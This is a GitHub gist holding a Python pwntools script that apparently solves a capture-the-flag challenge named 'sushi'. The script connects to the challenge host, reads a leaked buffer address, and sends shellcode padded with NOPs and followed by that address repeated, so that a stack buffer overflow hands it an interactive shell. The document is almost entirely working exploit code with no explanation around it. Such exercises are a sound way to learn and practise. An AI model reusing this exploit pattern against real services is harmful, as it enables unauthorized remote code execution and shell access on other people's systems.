Create a gist now

Instantly share code, notes, and snippets.

@m--- /sushi.py Secret
Last active Aug 29, 2015

What would you like to do?
# coding: utf-8
import os
import sys
import time
import re
import struct
import pwn
host = 'sushi.termsec.net'
port = 4000
shellcode = open('x64-linux-sh', 'rb').read()
p = lambda x: struct.pack('<Q', x)
s = pwn.remote(host, port)
result = s.recv()
matches = re.search('Deposit money for sushi here: (0x[0-9a-f]+)', result)
ptr_str1 = int(matches.group(1), 16)
pwn.log.info('str1: 0x%x' % ptr_str1)
payload = shellcode + ((len(shellcode) % 8) * '\x90') + (p(ptr_str1) * 100)
s.send(payload + '\n')
s.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment